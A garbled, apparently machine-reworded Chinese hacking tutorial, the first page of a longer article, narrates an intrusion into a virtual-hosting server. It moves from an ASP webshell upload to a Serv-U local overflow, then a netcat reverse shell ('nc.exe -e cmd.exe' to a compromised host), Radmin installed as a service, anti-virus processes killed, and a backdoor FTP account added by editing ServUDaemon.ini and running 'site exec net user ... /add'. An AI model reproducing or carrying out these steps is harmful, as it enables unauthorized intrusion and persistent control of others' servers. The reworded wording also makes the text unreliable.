绕过防火墙来晋升权限[网络技术]

根源:中国IT实行室

首先肯定一下目标:http://www.sun***.com ,常见的虚拟主机.操纵Upfile的漏洞相信大家得到webshell不难.我们这次得到这个webshell,不是DVBBS,而是安闲动力3.6的软件上传过滤不严.网站http://www.sun***.com/lemon/Index.asp是安闲动力3.6文章系统.Xr应用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的.于是,上传海洋2005a,成功得到webshell.

    测试一下权限,在cmd里运行set,得到主机一些信息,系统盘是D盘,也阐明了我们的webshell有运行权限的.那我们看看C盘有什么呢?莫非是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死.不要紧,再来查抄一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的.呵呵,是有本地溢出的呀,挖哈哈.

    思绪:上传serv-u本地溢出文件srv.exe和nc.exe操纵nc来反衔接得到系统shell.大家是不是发现海洋2005a那个上传的组件不好用(反正我总碰到这个问题),不要紧,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp.upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,改正up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp便可以上传了.

    传上了srv.exe和nc.exe在H:longsun***lemon(网站目录)后,发现没有运行权限.不要紧,按照经验,普通系统下D:Documents and SettingsAll Users是应当有运行权限的.于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死.

    可以浏览D:program filesserv-uServUDaemon.ini,不能改,莫非要破解serv-u的密码,晕,不想.

    不可以这么就气馁了,我忽然想到为什么系统不放在C盘了,莫非C盘是FAT32分区的?(后来证明了我们的设法.这里说一下,假如主机有win98的系统盘,那边99%是FAT32分区的.我们还碰到过装有Ghost的主机,为了便利在DOS下备份,它的备份盘普通都是FAT分区的.)假如系统盘是FAT32分区,则网站就没有什么安全性可言了.固然C盘不是系统盘,但是我们有履行权限.呵呵,copy srv.exe和nc.exe到c:,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888.我们在学校内网里,没有公网ip,不爽-ing.

    我们成功得到一个系统shell连上肉鸡.(看起来简单,其实这里我们也碰到过挫折,我们发现有些版本的nc竟然没有-e这个参数,还认为全世界nc功效都一样.后来又发现差别版本的nc互连不成功,会呈现乱码,没办法用.为此,上传n次,错误n次,傻了n次,后来终于成功了.做黑客还真得有耐烦和恒心.)

    高兴之余,我们仍不满意,因为这个shell实在是太慢了.于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就可以发现r_server了,但是还是喜好用它,是因为不会被查杀.好了,上传admdll.dll,raddrv.dll,r_server.exe到H:longsun***lemon,再用方才nc得到的shell把它们copy到d:winntsystem32下,辨别运行:r_server /install , net start r_server , r_server /pass:rain /save .

    一阵冗长的等候,终于显示成功了.兴冲冲用radmin连上去,发现衔接失利.晕死,忘了有防火墙了.上传pslist和pskill上去,发现有backice,木马克星等.Kill掉他们固然可以登陆,但服务器重启后还是不行,终不是长期之计呀.防火墙是不防21,80等端口的,于是,我们的思绪又回到了serv-u上了.把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上增添一个用户名为xr,密码为rain的系统帐号,加上全部权限.再用老办法,上传,用shell写入D:program filesserv-u里,覆盖掉本来的ServUDaemon.ini.固然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误.忧郁,怎么又失利了.(按照经验这样应当便可以了,但为什么不行没有想通,请高手指导.)

    不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还大概被发现.后来,眼睛一亮,我们不是有pskill吗?方才用pslist发现有这个进程:ServUDaemon .把它kill了.然后再运行D:program filesserv-u ServUAdmin.exe ,这里要注意不是ServUDaemon.exe .

    好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下.我们能不能运行系统号令呢?是可以的,这样便可以:

    ftp>quote site exec net user xr rain /add

[1] [2]  下一页